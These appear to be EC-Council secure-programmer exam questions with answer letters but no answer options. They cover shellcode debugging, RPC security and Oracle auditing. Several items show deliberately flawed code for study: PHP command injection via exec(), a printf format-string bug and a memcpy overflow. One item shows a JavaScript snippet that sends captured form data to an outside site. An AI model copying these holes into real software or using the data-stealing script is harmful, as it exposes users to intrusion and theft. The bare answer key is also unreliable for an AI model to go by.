
EC-COUNCIL EC-Council Certified Secure Programmer v2 - 312-92 Exam Questions
QUESTION NO: 1
Mathew is working on a Fedora machine and is having issues with some shellcode he wrote that is producing errors. Mathew decides to download and use Ktrace to debug the shellcode to see where the errors are originating from. Why will his plan not work?
Correct Answer: A
QUESTION NO: 2
William, a software developer just starting his career, was asked to create a website in PHP that would allow visitors to enter a month and a year for their birth date. The PHP code he creates has to validate the input after it is entered. If William uses the following code, what could a malicious user input to the year value to actually delete the whole website?
$month = $_GET['month'];
$year = $_GET['year'];
exec("cal $month $year", $result);
print "<PRE>";
foreach($result as $r)
{
    print "$r<BR>";
}
print "</PRE>";
Correct Answer: D
QUESTION NO: 3
Victor is creating an online shopping cart for his company that will accept credit cards as payment. What protocol that provides open encryption and security specifications designed to protect credit card transactions should Victor use?
Correct Answer: D
QUESTION NO: 4
If a developer wrote the following code, what would the script be vulnerable to?
#include <stdio.h>
int main(int argc, char **argv)
{
    int number = 5;
    printf(argv[1]);
    putchar('\n');
    printf("number (%p) is equal to %d\n", (void *)&number, number);
}
Correct Answer: B
QUESTION NO: 5
When making an RPC function call on the local machine, what function should be used?
Correct Answer: B
QUESTION NO: 6
What security package is implemented with the following code?
dwStatus = DsMakeSpn
(
    "ldap",
    "MyServer.Mydomain.com",
    NULL,
    0,
    NULL,
    &pcSpnLength,
    pszSpn
);
rpcStatus = RpcServerRegisterAuthInfo
(
    pszSpn,
    RPC_C_AUTHN_GSS_NEGOTIATE,
    NULL,
    NULL
);
Correct Answer: C
QUESTION NO: 7
Kevin is developing a webpage using HTML and JavaScript code. The webpage will have a lot of important content and will have a number of functions that Kevin does not want revealed through the source code. Why would Kevin choose to employ HTML Guardian to hide the source code of his webpage?
Correct Answer: D
QUESTION NO: 8
Cylie is the Oracle DBA for her company and now wants to track all actions on her Oracle server using auditing. What file should Cylie insert the following line into?
audit_trail = true
Correct Answer: C
QUESTION NO: 9
Simon is going through some of Heather's code and notices an issue. What issue did Simon find in the following code?
void f4(void * arg, size_t len)
{
    char *buff = new char[100];
    C *ptr = new C;
    memcpy(buff, arg, len);
    ptr->vf();
    return;
}
Correct Answer: A
QUESTION NO: 10
Travis, a senior systems developer for YNY Services, received an email recently from an unknown source. Instead of opening the email on his normal production machine, Travis decides to copy the email to a thumb drive and examine it from a quarantined PC not on the network. Travis examines the email and discovers a link that is supposed to take him to http://scarysite.com. Travis decides to get back on his production computer and examine the code of that site.
From the following code snippet, what has Travis discovered?
<script>
function object() {
    this.email setter = captureobject
}
function captureobject(x) {
    var objString = ""
    for(fld in this) {
        objString += fld + ": " + this[fld] + ", ";
    }
    objString += "email: " + x;
    var req = new XMLHttpRequest();
    req.open("GET", "http://scarysite.com?obj=" +
        escape(objString), true);
    req.send(null);
}
</script>
Correct Answer: D




